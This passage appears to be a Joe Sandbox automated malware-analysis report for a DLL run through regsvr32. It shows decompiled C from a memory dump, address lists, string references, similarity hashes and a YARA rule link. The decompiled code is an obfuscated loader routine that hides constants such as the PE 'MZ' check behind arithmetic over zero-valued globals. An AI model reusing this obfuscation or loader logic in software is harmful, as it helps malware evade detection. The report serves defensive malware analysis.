*0x6da81264 +  *0x6da8125c - _t325 *  *0x6da8126c *  *0x6da81260 + _t568 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 -  *0x6da81270 -  *0x6da81270 -  *0x6da81264, 0x70 - _t521 *  *0x6da81264 -  *0x6da81264 - _t271 *  *0x6da81270 *  *0x6da81264 -  *0x6da81268 - _t523 *  *0x6da81264 -  *0x6da81264 - _t274 *  *0x6da81270 *  *0x6da81264 -  *0x6da81268); // executed
						E6DA29400(_v24, _v12, _v84);
						 *0x6da83d4c(_v24);
						_t641 = _v12;
						_t333 = E6DA2A6F0(_v12, _v84); // executed
						 *0x6da83d74 = _t333;
						 *0x6da83d70(_a4, 1, 0);
						goto L9;
					}
				} else {
					L9:
					_t98 = 1;
				}
				return E6DA59DE2(_t98, _t384, _v28 ^ _t873, _t641, _t871, _t872);
			}

0x6da3bad0
0x6da3bad0
0x6da3bad0
0x6da3bad0
0x6da3bad6
0x6da3badd
0x6da3bae3
0x6da3baea
0x6da3baf1
0x6da3baf8
0x6da3baff
0x6da3bb06
0x6da3bb0d
0x6da3bb14
0x6da3bb1b
0x6da3bb22
0x6da3bb29
0x6da3bb30
0x6da3bb37
0x6da3bb3c
0x6da3bb3e
0x6da3bb88
0x6da3bb8d
0x6da3bb95
0x6da3bb40
0x6da3bb40
0x6da3bb4a
0x6da3bb54
0x6da3bb5e
0x6da3bb68
0x6da3bb72
0x6da3bb7c
0x6da3bba1
0x6da3bbaa
0x6da3bbb3
0x6da3bbbc
0x6da3bbc5
0x6da3bbce
0x6da3bbd7
0x6da3bbe0
0x6da3bbe9
0x6da3bbef
0x6da3bbf8
0x6da3bc01
0x6da3bc0a
0x6da3bc13
0x6da3bc1c
0x6da3bc25
0x6da3bc2e
0x6da3bc37
0x6da3bc40
0x6da3bc49
0x6da3bc4f
0x6da3bc60
0x6da3bc6f
0x6da3bc7e
0x6da3bc92
0x6da3bca8
0x6da3bcbe
0x6da3bcd4
0x6da3bcea
0x6da3bd00
0x6da3bd16
0x6da3bd2c
0x6da3bd42
0x6da3bd58
0x6da3bd6e
0x6da3bd84
0x6da3bd9a
0x6da3bdb0
0x6da3bdc6
0x6da3bddc
0x6da3bdf2
0x6da3be08
0x6da3be1e
0x6da3be34
0x6da3be4a
0x6da3be60
0x6da3be6e
0x6da3be73
0x6da3be76
0x6da3be88
0x6da3be8e
0x6da3be9f
0x6da3beb0
0x6da3beb3
0x6da3beba
0x6da3c2ba
0x6da3c2cf
0x6da3c2de
0x6da3c2ec
0x6da3c302
0x6da3c310
0x6da3c31f
0x6da3c361
0x6da3c376
0x6da3c385
0x6da3c393
0x6da3c3a9
0x6da3c3b7
0x6da3c3c6
0x6da3c408
0x6da3c41d
0x6da3c42c
0x6da3c43a
0x6da3c450
0x6da3c45e
0x6da3c46d
0x6da3c4af
0x6da3c4c4
0x6da3c4d3
0x6da3c4e1
0x6da3c4f7
0x6da3c505
0x6da3c514
0x6da3c556
0x6da3c56b
0x6da3c57a
0x6da3c588
0x6da3c59e
0x6da3c5ac
0x6da3c5bb
0x6da3c5f7
0x6da3c60c
0x6da3c61a
0x6da3c641
0x6da3c655
0x6da3c67c
0x6da3c6a2
0x6da3c6b7
0x6da3c6c6
0x6da3c6ed
0x6da3c702
0x6da3c729
0x6da3c750
0x6da3c764
0x6da3c773
0x6da3c799
0x6da3c7ae
0x6da3c7d4
0x6da3c7fb
0x6da3c810
0x6da3c81e
0x6da3c845
0x6da3c859
0x6da3c880
0x6da3c8ac
0x6da3c8b2
0x6da3c8b8
0x6da3c8dd
0x6da3c8ec
0x6da3c932
0x6da3c941
0x6da3c95d
0x6da3c95d
0x6da3c96c
0x6da3bec0
0x6da3bed3
0x6da3bf00
0x6da3bf0f
0x6da3bf2f
0x6da3bf4b
0x6da3bf59
0x6da3bf75
0x6da3bf96
0x6da3bfc3
0x6da3bfd1
0x6da3bff2
0x6da3c00d
0x6da3c01c
0x6da3c037
0x6da3c04e
0x6da3c069
0x6da3c07e
0x6da3c08d
0x6da3c0a9
0x6da3c0d7
0x6da3c0ed
0x6da3c103
0x6da3c118
0x6da3c127
0x6da3c143
0x6da3c171
0x6da3c19e
0x6da3c1b3
0x6da3c1c2
0x6da3c1d1
0x6da3c1e0
0x6da3c1ef
0x6da3c216
0x6da3c22b
0x6da3c23a
0x6da3c249
0x6da3c258
0x6da3c267
0x6da3c28a
0x6da3c28f
0x6da3c295
0x6da3c29b
0x6da3c29b
0x6da3c97b
0x6da3c989
0x6da3c992
0x6da3c995
0x6da3c9af
0x6da3c9ca
0x6da3c9df
0x6da3c9fb
0x6da3ca07
0x6da3ca1c
0x6da3ca2a
0x6da3ca39
0x6da3ca4d
0x6da3ca63
0x6da3caa3
0x6da3cab8
0x6da3cac7
0x6da3cad6
0x6da3caeb
0x6da3cb00
0x6da3cb40
0x6da3cb54
0x6da3cb63
0x6da3cb71
0x6da3cb86
0x6da3cb9c
0x6da3cbdb
0x6da3cbf0
0x6da3cbfe
0x6da3cc0d
0x6da3cc21
0x6da3cc37
0x6da3cc77
0x6da3cc8c
0x6da3cc9b
0x6da3ccaa
0x6da3ccbf
0x6da3ccd4
0x6da3cd08
0x6da3cd13
0x6da3cd27
0x6da3cd33
0x6da3cd40
0x6da3cd44
0x6da3cd4c
0x6da3cd59
0x00000000
0x6da3cd59
0x6da3baec
0x6da3cd5f
0x6da3cd5f
0x6da3cd5f
0x6da3cd71

Strings

kernel32.dll, xrefs: 6DA3BC53

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID: kernel32.dll
API String ID: 0-1793498882
Opcode ID: 99493673405c0d1621c47a5dce8d8a28088eaa255fb2b8cfacdbe0c97b5a12f5
Instruction ID: 9bf85476af677470e8cba4ac83d1a5789bbcc2dc97db45e1712796d3162bd189
Opcode Fuzzy Hash: 99493673405c0d1621c47a5dce8d8a28088eaa255fb2b8cfacdbe0c97b5a12f5
Instruction Fuzzy Hash: E3B2C27650C3018FCB08DF68CA95B7ABBB5F7A7316B45C629D821CB294F730A412CB46

Uniqueness

Uniqueness Score: -1.00%

Function 6DA2A720 Relevance: 10.4, APIs: 4, Instructions: 4424
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E6DA2A720(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v64;
				intOrPtr* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _t170;
				signed int _t172;
				void* _t199;
				signed int _t206;
				signed int _t208;
				signed int _t223;
				signed int _t225;
				signed int _t240;
				signed int _t242;
				signed int _t257;
				signed int _t259;
				signed int _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				signed int _t308;
				signed int _t310;
				signed int _t312;
				signed int _t315;
				signed int _t339;
				signed int _t341;
				signed int _t344;
				signed int _t346;
				void* _t349;
				signed int _t350;
				signed int _t354;
				signed int _t362;
				signed int _t368;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				signed int _t385;
				signed int _t387;
				signed int _t389;
				signed int _t391;
				signed int _t393;
				signed int _t395;
				signed int _t397;
				signed int _t399;
				signed int _t401;
				signed int _t403;
				signed int _t405;
				signed int _t407;
				signed int _t424;
				signed int _t434;
				signed int _t436;
				signed int _t439;
				signed int _t442;
				signed int _t445;
				signed int _t450;
				signed int _t452;
				signed int _t454;
				signed int _t456;
				signed int _t458;
				signed int _t460;
				signed int _t462;
				signed int _t465;
				signed int _t468;
				signed int _t471;
				signed int _t476;
				signed int _t478;
				signed int _t480;
				signed int _t482;
				signed int _t484;
				signed int _t486;
				signed int _t488;
				signed int _t491;
				signed int _t494;
				signed int _t497;
				signed int _t502;
				signed int _t504;
				signed int _t506;
				signed int _t508;
				signed int _t510;
				signed int _t512;
				signed int _t514;
				signed int _t517;
				signed int _t520;
				signed int _t523;
				signed int _t528;
				signed int _t530;
				signed int _t532;
				signed int _t534;
				signed int _t536;
				signed int _t538;
				signed int _t541;
				signed int _t543;
				signed int _t545;
				signed int _t548;
				signed int _t550;
				signed int _t552;
				signed int _t554;
				signed int _t556;
				signed int _t559;
				signed int _t561;
				signed int _t563;
				signed int _t565;
				signed int _t567;
				signed int _t576;
				signed int _t578;
				void* _t586;
				signed int _t621;
				signed int _t623;
				signed int _t625;
				signed int _t627;
				signed int _t630;
				void* _t633;
				signed int _t634;
				signed int _t635;
				signed int _t637;
				signed int _t639;
				signed int _t641;
				signed int _t643;
				signed int _t645;
				signed int _t647;
				signed int _t649;
				signed int _t651;
				signed int _t653;
				signed int _t655;
				signed int _t657;
				signed int _t659;
				signed int _t661;
				signed int _t663;
				signed int _t665;
				signed int _t667;
				signed int _t669;
				signed int _t671;
				signed int _t673;
				signed int _t675;
				signed int _t677;
				signed int _t679;
				signed int _t685;
				signed int _t687;
				signed int _t689;
				signed int _t691;
				signed int _t694;
				intOrPtr _t696;
				signed int _t697;
				signed int _t699;
				signed int _t701;
				void* _t714;
				intOrPtr _t734;
				signed int _t736;
				signed int _t738;
				signed int _t740;
				signed int _t751;
				signed int _t755;
				signed int _t781;
				signed int _t783;
				signed int _t787;
				signed int _t813;
				signed int _t815;
				signed int _t817;
				void* _t819;
				signed int _t820;
				signed int _t822;
				signed int _t824;
				signed int _t826;
				signed int _t828;
				signed int _t831;
				signed int _t834;
				signed int _t844;
				signed int _t846;
				signed int _t854;
				signed int _t867;
				signed int _t869;
				signed int _t882;
				signed int _t884;
				signed int _t886;
				signed int _t888;
				signed int _t890;
				signed int _t892;
				signed int _t894;
				signed int _t896;
				signed int _t898;
				signed int _t900;
				signed int _t902;
				signed int _t904;
				signed int _t906;
				signed int _t908;
				signed int _t910;
				signed int _t912;
				signed int _t914;
				signed int _t916;
				signed int _t918;
				signed int _t920;
				signed int _t922;
				signed int _t924;
				signed int _t926;
				signed int _t928;
				signed int _t930;
				signed int _t932;
				signed int _t935;
				signed int _t937;
				signed int _t939;
				signed int _t941;
				signed int _t943;
				signed int _t945;
				signed int _t947;
				signed int _t949;
				signed int _t951;
				signed int _t953;
				signed int _t955;
				signed int _t957;
				signed int _t962;
				signed int _t963;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t972;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t977;
				signed int _t978;
				signed int _t979;
				signed int _t980;
				signed int _t981;
				signed int _t982;
				signed int _t983;
				signed int _t984;
				signed int _t985;
				signed int _t987;
				signed int _t988;
				signed int _t989;
				signed int _t990;
				signed int _t994;
				signed int _t996;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1003;
				signed int _t1004;
				signed int _t1005;
				signed int _t1006;
				signed int _t1007;
				signed int _t1009;
				signed int _t1010;
				signed int _t1011;
				signed int _t1012;
				signed int _t1016;
				signed int _t1018;
				signed int _t1019;
				signed int _t1020;
				signed int _t1021;
				signed int _t1022;
				signed int _t1023;
				signed int _t1024;
				signed int _t1025;
				signed int _t1026;
				signed int _t1027;
				signed int _t1029;
				signed int _t1031;
				signed int _t1033;
				signed int _t1035;
				signed int _t1037;
				signed int _t1039;
				signed int _t1041;
				signed int _t1044;
				signed int _t1047;
				signed int _t1050;
				void* _t1053;
				intOrPtr _t1078;
				signed int _t1079;
				signed int _t1082;
				signed int _t1084;
				signed int _t1086;
				signed int _t1089;
				signed int _t1091;
				signed int _t1093;
				signed int _t1096;
				signed int _t1098;
				void* _t1100;
				signed int _t1101;
				signed int _t1103;
				signed int _t1105;
				signed int _t1107;
				signed int _t1109;
				signed int _t1112;
				signed int _t1114;
				signed int _t1116;
				signed int _t1118;
				signed int _t1120;
				void* _t1122;
				void* _t1166;
				signed int _t1170;
				signed int _t1172;
				signed int _t1176;
				signed int _t1178;
				signed int _t1181;
				signed int _t1184;
				signed int _t1186;
				signed int _t1190;
				signed int _t1192;
				signed int _t1195;
				signed int _t1198;
				signed int _t1200;
				signed int _t1204;
				signed int _t1206;
				signed int _t1209;
				signed int _t1216;
				signed int _t1218;
				signed int _t1239;
				signed int _t1241;
				signed int _t1244;
				signed int _t1246;
				signed int _t1248;
				signed int _t1251;
				signed int _t1254;
				signed int _t1256;
				signed int _t1258;
				signed int _t1260;
				signed int _t1262;
				signed int _t1264;
				signed int _t1267;
				signed int _t1270;
				signed int _t1272;
				signed int _t1274;
				signed int _t1276;
				signed int _t1278;
				signed int _t1280;
				signed int _t1283;
				signed int _t1286;
				signed int _t1288;
				signed int _t1290;
				signed int _t1292;
				signed int _t1294;
				signed int _t1296;
				signed int _t1299;
				signed int _t1302;
				signed int _t1304;
				signed int _t1306;
				signed int _t1308;
				signed int _t1310;
				signed int _t1312;
				signed int _t1315;
				signed int _t1318;
				signed int _t1320;
				signed int _t1322;
				signed int _t1324;
				void* _t1326;
				signed int _t1337;
				signed int _t1339;
				signed int _t1341;
				signed int _t1358;
				signed int _t1360;
				signed int _t1362;
				signed int _t1372;
				signed int _t1374;
				signed int _t1376;
				signed int _t1384;
				signed int _t1386;
				signed int _t1388;
				signed int _t1395;
				signed int _t1397;
				signed int _t1399;
				signed int _t1407;
				signed int _t1409;
				signed int _t1414;
				signed int _t1415;
				signed int _t1417;
				signed int _t1419;
				signed int _t1421;
				signed int _t1423;
				signed int _t1426;
				signed int _t1428;
				signed int _t1430;
				signed int _t1445;
				signed int _t1448;
				signed int _t1450;
				signed int _t1465;
				signed int _t1468;
				signed int _t1470;
				signed int _t1473;
				signed int _t1475;
				signed int _t1477;
				intOrPtr _t1484;
				signed int _t1503;
				signed int _t1510;
				signed int _t1512;
				signed int _t1526;
				signed int _t1528;
				signed int _t1563;
				signed int _t1565;
				signed int _t1568;
				signed int _t1573;
				signed int _t1575;
				signed int _t1580;
				signed int _t1582;
				signed int _t1587;
				signed int _t1589;
				signed int _t1594;
				signed int _t1596;
				signed int _t1598;
				signed int _t1619;
				signed int _t1621;
				signed int _t1623;
				signed int _t1626;
				signed int _t1628;
				signed int _t1631;
				signed int _t1649;
				signed int _t1651;
				signed int _t1654;
				signed int _t1678;
				signed int _t1681;
				signed int _t1686;
				signed int _t1689;
				signed int _t1701;
				signed int _t1713;
				signed int _t1761;
				signed int _t1763;
				signed int _t1765;
				signed int _t1767;
				signed int _t1769;
				signed int _t1771;
				signed int _t1775;
				signed int _t1919;
				signed int _t1928;
				signed int _t1930;
				signed int _t1939;
				signed int _t1941;
				signed int _t1943;
				signed int _t1946;
				signed int _t1949;
				signed int _t1951;
				signed int _t1953;
				signed int _t1955;
				signed int _t1957;
				signed int _t1959;
				signed int _t1961;
				signed int _t1963;
				signed int _t1975;
				signed int _t2053;
				signed int _t2055;
				signed int _t2058;
				signed int _t2060;
				signed int _t2073;
				signed int _t2076;
				signed int _t2082;
				signed int _t2085;
				signed int _t2089;
				signed int _t2091;
				signed int _t2093;
				signed int _t2096;
				signed int _t2098;
				signed int _t2104;
				signed int _t2106;
				signed int _t2108;
				signed int _t2110;
				signed int _t2112;
				signed int _t2123;
				signed int _t2130;
				signed int _t2132;
				signed int _t2136;
				signed int _t2162;
				signed int _t2164;
				signed int _t2168;
				signed int _t2173;
				signed int _t2175;
				signed int _t2178;
				signed int _t2180;
				signed int _t2182;
				signed int _t2184;
				signed int _t2186;
				signed int _t2189;
				signed int _t2192;
				signed int _t2195;
				signed int _t2197;
				signed int _t2208;
				signed int _t2221;
				signed int _t2223;
				signed int _t2236;
				signed int _t2239;
				signed int _t2242;
				signed int _t2244;
				signed int _t2247;
				signed int _t2249;
				signed int _t2252;
				signed int _t2254;
				signed int _t2257;
				signed int _t2259;
				signed int _t2262;
				signed int _t2264;
				signed int _t2267;
				signed int _t2269;
				signed int _t2272;
				signed int _t2274;
				signed int _t2276;
				signed int _t2278;
				signed int _t2281;
				signed int _t2284;
				signed int _t2286;
				signed int _t2289;
				signed int _t2292;
				signed int _t2294;
				signed int _t2296;
				signed int _t2298;
				signed int _t2300;
				signed int _t2303;
				signed int _t2305;
				signed int _t2307;
				signed int _t2310;
				signed int _t2313;
				signed int _t2315;
				signed int _t2318;
				signed int _t2321;
				signed int _t2323;
				signed int _t2325;
				signed int _t2327;
				signed int _t2329;
				signed int _t2384;
				signed int _t2387;
				signed int _t2389;
				signed int _t2392;
				signed int _t2395;
				signed int _t2397;
				signed int _t2401;
				signed int _t2403;
				signed int _t2405;
				signed int _t2407;
				signed int _t2410;
				signed int _t2412;
				signed int _t2415;
				signed int _t2418;
				signed int _t2420;
				signed int _t2422;
				signed int _t2425;
				signed int _t2427;
				signed int _t2429;
				signed int _t2432;
				signed int _t2434;
				signed int _t2436;
				signed int _t2439;
				signed int _t2441;
				signed int _t2443;
				signed int _t2445;
				signed int _t2447;
				signed int _t2449;
				signed int _t2451;
				signed int _t2454;
				signed int _t2456;
				signed int _t2458;
				signed int _t2460;
				signed int _t2462;
				signed int _t2464;
				signed int _t2468;
				signed int _t2470;
				signed int _t2472;
				signed int _t2475;
				signed int _t2478;
				signed int _t2480;
				signed int _t2483;
				signed int _t2485;
				signed int _t2487;
				signed int _t2489;
				signed int _t2491;
				signed int _t2493;
				signed int _t2495;
				signed int _t2498;
				signed int _t2502;
				signed int _t2504;
				signed int _t2507;
				signed int _t2512;
				signed int _t2515;
				signed int _t2518;
				signed int _t2520;
				signed int _t2524;
				signed int _t2526;
				signed int _t2529;
				signed int _t2532;
				signed int _t2534;
				signed int _t2538;
				signed int _t2540;
				signed int _t2543;
				signed int _t2546;
				signed int _t2548;
				signed int _t2552;
				signed int _t2569;
				signed int _t2571;
				signed int _t2574;
				signed int _t2576;
				signed int _t2579;
				signed int _t2581;
				signed int _t2583;
				signed int _t2585;
				signed int _t2589;
				signed int _t2591;
				signed int _t2593;
				signed int _t2599;
				signed int _t2602;
				signed int _t2606;
				signed int _t2608;
				signed int _t2612;
				signed int _t2614;
				signed int _t2616;
				signed int _t2622;
				signed int _t2625;
				signed int _t2629;
				signed int _t2631;
				signed int _t2635;
				signed int _t2637;
				signed int _t2639;
				signed int _t2645;
				signed int _t2648;
				signed int _t2652;
				signed int _t2654;
				signed int _t2658;
				signed int _t2660;
				signed int _t2662;
				signed int _t2668;
				signed int _t2671;
				signed int _t2675;
				signed int _t2677;
				signed int _t2681;
				signed int _t2683;
				signed int _t2685;
				signed int _t2691;
				signed int _t2694;
				signed int _t2698;
				signed int _t2700;
				signed int _t2702;
				signed int _t2719;
				signed int _t2721;
				signed int _t2723;
				signed int _t2726;
				signed int _t2728;
				signed int _t2730;
				signed int _t2737;
				signed int _t2739;
				signed int _t2741;
				signed int _t2743;
				signed int _t2750;
				signed int _t2752;
				signed int _t2754;
				signed int _t2762;
				signed int _t2764;
				signed int _t2766;
				signed int _t2773;
				signed int _t2775;
				signed int _t2777;
				signed int _t2798;
				signed int _t2800;
				signed int _t2830;
				signed int _t2832;
				signed int _t2844;
				signed int _t2847;
				signed int _t2851;
				signed int _t2853;
				signed int _t2855;
				signed int _t2857;
				signed int _t2859;
				signed int _t2861;
				signed int _t2879;
				signed int _t2883;
				signed int _t2885;
				signed int _t2897;
				signed int _t2899;
				signed int _t2901;
				signed int _t2903;
				signed int _t2905;
				signed int _t2909;
				signed int _t2913;
				signed int _t2915;
				signed int _t2919;
				signed int _t2921;
				signed int _t2923;
				signed int _t2925;
				signed int _t2928;
				signed int _t2930;
				signed int _t2933;
				signed int _t2936;
				signed int _t2938;
				signed int _t2952;
				signed int _t2955;
				signed int _t2957;
				signed int _t2960;
				signed int _t2962;
				signed int _t2965;
				signed int _t2978;
				signed int _t2982;
				signed int _t2984;
				signed int _t2986;
				signed int _t2989;
				signed int _t3033;
				signed int _t3035;
				signed int _t3037;
				signed int _t3041;
				signed int _t3043;
				signed int _t3045;
				signed int _t3049;
				signed int _t3051;
				signed int _t3053;
				signed int _t3060;
				signed int _t3068;
				signed int _t3070;
				signed int _t3073;
				signed int _t3075;
				signed int _t3077;
				signed int _t3079;
				signed int _t3084;
				signed int _t3086;
				signed int _t3088;
				signed int _t3090;
				signed int _t3092;
				signed int _t3094;
				signed int _t3097;
				signed int _t3099;
				signed int _t3101;
				signed int _t3103;
				signed int _t3108;
				signed int _t3110;
				signed int _t3112;
				signed int _t3114;
				signed int _t3116;
				signed int _t3118;
				signed int _t3121;
				signed int _t3123;
				signed int _t3125;
				signed int _t3127;
				signed int _t3132;
				signed int _t3134;
				signed int _t3136;
				signed int _t3138;
				signed int _t3140;
				signed int _t3142;
				signed int _t3145;
				signed int _t3147;
				signed int _t3149;
				signed int _t3151;
				signed int _t3156;
				signed int _t3158;
				signed int _t3160;
				signed int _t3162;
				signed int _t3164;
				signed int _t3166;
				signed int _t3168;
				signed int _t3170;
				signed int _t3172;
				signed int _t3175;
				signed int _t3177;
				signed int _t3179;
				signed int _t3181;
				signed int _t3183;
				signed int _t3195;
				signed int _t3197;
				signed int _t3206;
				signed int _t3208;
				signed int _t3210;
				signed int _t3212;
				signed int _t3214;
				signed int _t3216;
				signed int _t3218;
				signed int _t3221;
				signed int _t3258;
				signed int _t3259;
				signed int _t3261;
				signed int _t3264;
				signed int _t3268;
				signed int _t3271;
				signed int _t3275;
				signed int _t3278;
				signed int _t3282;
				signed int _t3285;
				signed int _t3289;
				signed int _t3292;
				signed int _t3412;
				signed int _t3428;
				signed int _t3430;
				signed int _t3442;
				signed int _t3446;
				signed int _t3453;
				signed int _t3455;
				signed int _t3459;
				signed int _t3462;
				signed int _t3464;
				signed int _t3466;
				signed int _t3468;
				signed int _t3470;
				signed int _t3474;
				signed int _t3476;
				signed int _t3478;
				signed int _t3480;
				signed int _t3483;
				signed int _t3493;
				signed int _t3519;
				signed int _t3521;
				signed int _t3525;
				signed int _t3551;
				signed int _t3607;
				signed int _t3617;
				signed int _t3620;
				signed int _t3622;
				signed int _t3635;
				signed int _t3790;
				signed int _t3792;
				signed int _t3794;
				signed int _t3836;
				signed int _t3838;
				signed int _t3840;
				signed int _t3842;
				signed int _t3844;
				signed int _t3846;
				signed int _t3848;
				signed int _t3851;
				signed int _t3855;
				signed int _t3857;
				signed int _t3860;
				signed int _t3862;
				signed int _t3864;
				signed int _t3866;
				signed int _t3868;
				signed int _t3872;
				signed int _t3874;
				signed int _t3876;
				signed int _t3879;
				signed int _t3882;
				signed int _t3884;
				signed int _t4001;
				signed int _t4004;
				signed int _t4006;
				signed int _t4008;
				signed int _t4010;
				signed int _t4096;
				signed int _t4098;
				signed int _t4101;
				signed int _t4103;
				signed int _t4105;
				signed int _t4108;
				signed int _t4110;
				signed int _t4112;
				signed int _t4129;
				signed int _t4131;
				signed int _t4132;
				signed int _t4134;
				signed int _t4142;
				signed int _t4144;
				signed int _t4146;
				signed int _t4153;
				signed int _t4155;
				signed int _t4157;
				signed int _t4165;
				signed int _t4167;
				signed int _t4169;
				signed int _t4176;
				signed int _t4178;
				signed int _t4179;
				signed int _t4181;
				signed int _t4201;
				signed int _t4203;
				signed int _t4205;
				signed int _t4208;
				signed int _t4219;
				signed int _t4222;
				signed int _t4224;
				signed int _t4239;
				signed int _t4242;
				signed int _t4244;
				signed int _t4251;
				signed int _t4263;
				signed int _t4266;
				signed int _t4268;
				signed int _t4271;
				signed int _t4273;
				signed int _t4275;
				signed int _t4277;
				signed int _t4279;
				signed int _t4299;
				signed int _t4306;
				signed int _t4310;
				signed int _t4312;
				signed int _t4314;
				signed int _t4318;
				signed int _t4320;
				signed int _t4324;
				signed int _t4326;
				signed int _t4328;
				void* _t4331;
				void* _t4332;
				void* _t4333;
				void* _t4334;
				void* _t4336;
				void* _t4337;
				void* _t4338;
				void* _t4341;
				void* _t4342;
				void* _t4343;

				_v72 = 0;
				_v20 = 0;
				_t170 =  *0x6da81268; // 0x0
				_t2905 =  *0x6da81260; // 0x0
				_t172 =  *0x6da81268; // 0x0
				_t2909 =  *0x6da81260; // 0x0
				_t1563 =  *0x6da81264; // 0x0
				_t2913 =  *0x6da8126c; // 0x0
				_t1565 =  *0x6da81264; // 0x0
				_t2915 =  *0x6da8126c; // 0x0
				_t199 = E6DA2FAE0(_a8 +  *0x6da81270 -  *0x6da8126c -  *0x6da81260 -  *0x6da81260 + _t1563 *  *0x6da8125c -  *0x6da81270 -  *0x6da8126c +  *0x6da8125c -  *0x6da81260 - _t2913 *  *0x6da8126c +  *0x6da8125c +  *0x6da81270 +  *0x6da81270 -  *0x6da8126c -  *0x6da81260 -  *0x6da81260 + _t1565 *  *0x6da8125c -  *0x6da81270 -  *0x6da8126c +  *0x6da8125c -  *0x6da81260 - _t2915 *  *0x6da8126c +  *0x6da8125c +  *0x6da81270, 0x40 - _t170 *  *0x6da8126c - _t2905 *  *0x6da8125c *  *0x6da81268 *  *0x6da81260 +  *0x6da81264 -  *0x6da81260 +  *0x6da8126c - _t172 *  *0x6da8126c - _t2909 *  *0x6da8125c *  *0x6da81268 *  *0x6da81260 +  *0x6da81264 -  *0x6da81260 +  *0x6da8126c);
				_t4333 = _t4332 + 8;
				if(_t199 != 0) {
					_v16 = _a4;
					_t1568 =  *0x6da8125c; // 0x0
					_t206 =  *0x6da81270; // 0x0
					_t208 =  *0x6da81264; // 0x0
					_t1573 =  *0x6da81268; // 0x0
					_t1575 =  *0x6da8125c; // 0x0
					_t223 =  *0x6da81270; // 0x0
					_t225 =  *0x6da81264; // 0x0
					_t1580 =  *0x6da81268; // 0x0
					_t1582 =  *0x6da8125c; // 0x0
					_t240 =  *0x6da81270; // 0x0
					_t242 =  *0x6da81264; // 0x0
					_t1587 =  *0x6da81268; // 0x0
					_t1589 =  *0x6da8125c; // 0x0
					_t257 =  *0x6da81270; // 0x0
					_t259 =  *0x6da81264; // 0x0
					_t1594 =  *0x6da81268; // 0x0
					if(( *_v16 & 0x0000ffff) == _t259 *  *0x6da81264 *  *0x6da81264 + _t1589 *  *0x6da81260 + _t242 *  *0x6da81264 *  *0x6da81264 + _t1582 *  *0x6da81260 + _t225 *  *0x6da81264 *  *0x6da81264 + _t1575 *  *0x6da81260 + _t208 *  *0x6da81264 *  *0x6da81264 + _t1568 *  *0x6da81260 + 0x5a4d -  *0x6da81270 -  *0x6da8126c -  *0x6da81268 +  *0x6da8126c + _t206 *  *0x6da81260 +  *0x6da81270 +  *0x6da81260 - _t1573 *  *0x6da8125c +  *0x6da81264 +  *0x6da8126c +  *0x6da8126c +  *0x6da81264 +  *0x6da8125c -  *0x6da81270 -  *0x6da8126c -  *0x6da81268 +  *0x6da8126c + _t223 *  *0x6da81260 +  *0x6da81270 +  *0x6da81260 - _t1580 *  *0x6da8125c +  *0x6da81264 +  *0x6da8126c +  *0x6da8126c +  *0x6da81264 +  *0x6da8125c -  *0x6da81270 -  *0x6da8126c -  *0x6da81268 +  *0x6da8126c + _t240 *  *0x6da81260 +  *0x6da81270 +  *0x6da81260 - _t1587 *  *0x6da8125c +  *0x6da81264 +  *0x6da8126c +  *0x6da8126c +  *0x6da81264 +  *0x6da8125c -  *0x6da81270 -  *0x6da8126c -  *0x6da81268 +  *0x6da8126c + _t257 *  *0x6da81260 +  *0x6da81270 +  *0x6da81260 - _t1594 *  *0x6da8125c +  *0x6da81264 +  *0x6da8126c +  *0x6da8126c +  *0x6da81264 +  *0x6da8125c) {
						_t8 = _v16 + 0x3c; // 0xa83d743d
						_t1596 =  *0x6da81270; // 0x0
						_t2919 =  *0x6da81260; // 0x0
						_t1598 =  *0x6da81260; // 0x0
						_t2921 =  *0x6da81270; // 0x0
						_t279 =  *0x6da81268; // 0x0
						_t2923 =  *0x6da8125c; // 0x0
						_t282 =  *0x6da81270; // 0x0
						_t2925 =  *0x6da81264; // 0x0
						_t285 =  *0x6da81270; // 0x0
						_t2928 =  *0x6da81260; // 0x0
						_t287 =  *0x6da81260; // 0x0
						_t1619 =  *0x6da81270; // 0x0
						_t2930 =  *0x6da81268; // 0x0
						_t1621 =  *0x6da8125c; // 0x0
						_t2933 =  *0x6da81270; // 0x0
						_t1623 =  *0x6da81264; // 0x0
						_t2936 =  *0x6da81270; // 0x0
						_t1626 =  *0x6da81260; // 0x0
						_t2938 =  *0x6da81260; // 0x0
						_t308 =  *0x6da81270; // 0x0
						_t1628 =  *0x6da81268; // 0x0
						_t310 =  *0x6da8125c; // 0x0
						_t1631 =  *0x6da81270; // 0x0
						_t312 =  *0x6da81264; // 0x0
						_t2952 =  *0x6da81260; // 0x0
						_t315 =  *0x6da81264; // 0x0
						_t1649 =  *0x6da8126c; // 0x0
						_t2955 =  *0x6da81264; // 0x0
						_t1651 =  *0x6da81260; // 0x0
						_t2957 =  *0x6da81260; // 0x0
						_t1654 =  *0x6da81264; // 0x0
						_t2960 =  *0x6da8126c; // 0x0
						_t339 =  *0x6da81264; // 0x0
